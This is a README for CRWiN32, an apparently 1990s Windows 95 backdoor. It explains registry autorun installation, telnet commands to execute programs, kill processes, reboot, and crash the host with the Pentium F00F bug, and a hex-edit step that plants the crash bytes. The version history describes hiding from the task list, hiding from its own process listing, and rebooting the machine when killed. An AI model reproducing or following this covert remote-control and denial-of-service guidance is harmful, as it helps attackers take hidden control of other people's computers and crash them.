CRWiN32 README -------------- 1. INSTALLING / UNINSTALLING To install this program, copy CRWIN32.EXE into your windows directory and type "crwin32 /setup" This will add a value to your registry which will cause CRWiN32 to load every time windows starts. To remove the program, type "crwin32 /remove" This will remove all CRWiN32 information from your registry; you can then delete CRWIN32.EXE (and CRWIN32.DAT - see below). 2. LOG FILE CRWiN32 logs all connections from clients to a file "CRWIN32.DAT" in your windows directory. Any error messages are also logged here. 3. USING CRWiN32 To connect to CRWiN32 from a remote computer, telnet to the machine running CRWiN32, on the port CRWIN_PORT (check crwin32.c for this value). Do not use Windows95 TELNET.EXE for this, you will be disconnected. You can then type any of the following commands: "exec [full path of program on remote computer]" This will execute a program installed on the remote computer. "harakiri" This will cause CRWiN32 to commit harakiri. For those unfamiliar with this word, it means ritual suicide (i.e. CRWiN32 terminates). "kill [process number]" This will kill a specified process. See the command "ps". Killing KERNEL32.DLL will most likely crash the remote computer. "nuke" This will attempt to execute the Pentium Bug on the remote computer. It will probably cause CRWiN32 to terminate on non-Pentium machines. The "Pentium Bug" is the four bytes F00FC7C8. "ps" This will list all processes running on the remote computer, except for CRWiN32. "quit" Disconnect from CRWiN32. "reboot" Shuts down Windows 95 on the remote computer and reboots the machine. Any running processes are terminated forcefully. "shutdown" Shuts down Windows 95 on the remote computer and turns off ATX machines. 4. EXITING CRWiN32 To terminate CRWiN32 once it is running on a computer, either (a) Kill it through a telnet session (see 3. USING CRWiN32), or (b) Kill it with something like PVIEW95.EXE. With earlier versions (pre 1.5), pressing CTRL+ATL+DEL and attempting to kill CRWiN32 through the task manager would have rebooted your computer. In fact, CRWiN32 will reboot your computer when any program tries to kill it with ExitProcess() [Pview95 uses TerminateProcess()]. 5. COMPILING CRWiN32 CRWiN32 was compiled with Microsoft Visual C++ 5.0, though it should work with other compilers. The only extra thing which needs to be done once CRWiN32 is compiled is to hex-edit the Pentium Bug. This is done as follows: (a) Open CRWIN32.EXE in your favourite hex editor. (b) Search for the bytes 33C033C0. (c) Replace with F00FC7C8. If this is not done, then activating the Pentium Bug through CRWiN32 will not work. 6. VERSION HISTORY 1.5 After Reverse Engineering Back Orifice, I found out about the wonderful RegisterServiceProcess function. Just like Back Orifice, CRWiN32 no longer appears on the CTRL+ALT+DEL task list. 1.4 CRWiN32 now detects the presence of Back Orifice, by The Cult of the Dead Cow. On startup CRWiN32 prompts the user whether to remove Back Orifice from the machine. 1.3 Added the commands "exec", "shutdown", "reboot", "harakiri". "ps" no longer shows the presence of CRWiN32. 1.2 Added the commands "ps", "kill". 1.0 First release. Capable of crashing a machine with the Pentium Bug. Available commands are "nuke", "quit".